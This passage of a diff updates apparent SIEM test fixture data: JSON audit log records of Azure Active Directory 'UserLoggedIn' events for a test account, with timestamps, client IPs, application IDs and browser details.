"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "73f0a2ef-35be-4a71-9545-59d879fc8fb2"}
-{"InterSystemsId": "d5effb7f-9d39-4893-90f6-9cfeec7ed1a7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f22a3ad7-22e7-4296-a600-e4e9161a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3783acda-5ded-4d69-95b6-3df5344c0ce0"}
-{"InterSystemsId": "d960e058-1adb-4a84-a65b-1a6ce367e323", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:03", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1dfdb693-18a1-4cff-aa3e-61feaa356100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f67568b1-64c4-4165-bdd9-16a5b9142eef"}
-{"InterSystemsId": "e2565aaf-91b0-4ccd-8810-743123eb7383", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "21166e08-6589-4c2d-a325-c97ba45f2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a8114a24-d342-4689-b75e-51e6386763de"}
-{"InterSystemsId": "ede626b9-2035-4d02-8330-201c4ae82af6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "98612804-9aa6-40a4-b72a-808bc7742000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1eaf9c65-8c67-4cd9-9277-771589113752"}
-{"InterSystemsId": "fc5c6c90-a6ba-486c-b685-8d67c529d3aa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:39", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6e184f6f-887b-4410-b24d-723031366000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3c439e46-d454-4767-9320-1e75540821b7"}
+{"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"}
+{"InterSystemsId": "05d69096-cb90-4690-ae69-8acd5177b3e0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ed155e11-60b3-4764-b9aa-05c35f3bb800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b53de36d-ea71-4ebf-9b71-feb431bd4eba"}
+{"InterSystemsId": "0f5eb16e-8b22-49bf-a927-f6f310fd5879", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6634d05a-72ec-4c27-8e69-03c57b202000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "10e2d141-839e-4913-ab3d-6cf1f4856eae"}
+{"InterSystemsId": "1150acae-a48d-4752-8847-7bacb7fe6e6c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1809f830-b010-4389-9607-e01ae175ca00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "68b3fd99-0dae-4479-926d-03cc0073dd08"}
+{"InterSystemsId": "16e81fcc-add3-46c2-8834-10ce330ffe76", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2a84e6ff-7340-426e-9d0d-e53092c0c600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "550af372-cdfd-4286-a1b7-d58df0dcd5d6"}
+{"InterSystemsId": "172703f7-324e-415a-a846-c39ca97eb1c8", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d66cd29f-596e-4878-b756-92b545d25f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b5f59a43-00cf-42c4-8685-a7166fd20e38"}
+{"InterSystemsId": "17f8756c-0bfa-49ad-8537-ada4e17a5f7d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:41", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1b395e92-5d02-408f-8bfe-139098a95500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "32e7fb94-6289-4fb4-855b-2ab78671ca4e"}
+{"InterSystemsId": "22aac168-9d0d-4c70-b94d-adc337ab7b06", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba18ea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "7314a65a-f383-40fb-a0c7-00c6c4cfabc0"}
+{"InterSystemsId": "23321532-a321-4c97-909d-9489979777d6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1909acba-a486-4ffc-805c-09fb73c0bf00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "97b494ee-9ba1-4444-b052-3459bdc9eaa5"}
+{"InterSystemsId": "291fb7ce-4e56-47fd-a78e-4e9012f112ab", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "391870e6-1729-40ae-9ebb-51e0652fec9b"}
+{"InterSystemsId": "30e5377b-31d8-42c2-8170-13404afacde7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8971516f-3ef3-4de0-b6b8-ebfae386bc00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a7538fb0-3213-41dc-ab38-1aed787e0cdc"}
+{"InterSystemsId": "32e2f533-40fb-4783-8c66-d1bad7e1cc88", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "74ab94ce-8928-4aff-8fa2-a66ad6d41f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e2a15fc0-6892-41f5-a41c-e515231cbb0a"}
